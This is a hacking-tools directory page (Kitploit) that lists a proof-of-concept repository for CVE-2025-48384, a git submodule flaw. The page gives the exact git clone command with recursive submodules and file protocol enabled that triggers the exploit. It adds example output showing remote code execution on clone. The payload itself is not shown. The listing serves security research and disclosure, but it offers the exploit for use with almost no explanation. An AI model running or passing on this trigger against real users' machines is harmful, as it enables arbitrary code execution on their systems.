Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-48384 — PoC for CVE-2025-48384 | Kitploit
Tools/GitHubGitHub/liamg/cve-2025-48384
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubliamg/cve-2025-48384

CVE-2025-48384

PoC for CVE-2025-48384

View Repository
20201 year agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

PoC for CVE-2025-48384

See CVE-2025-48384

To run:

root@kitploit:~
git -c protocol.file.allow=always clone --recurse-submodules [email protected]:liamg/CVE-2025-48384.git

Example output:

root@kitploit:~
git -c protocol.file.allow=always clone --recurse-submodules CVE-2025-48384 test
Cloning into 'test'...
done.
'ubmodule 'sub' ([email protected]:liamg/CVE-2025-48384-submodule.git) registered for path 'sub
'...ing into '/Users/liamg/test/sub
remote: Enumerating objects: 5, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 5 (delta 0), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (5/5), done.
Uh-oh, this is an RCE!

The executed payload is here.

Download Tool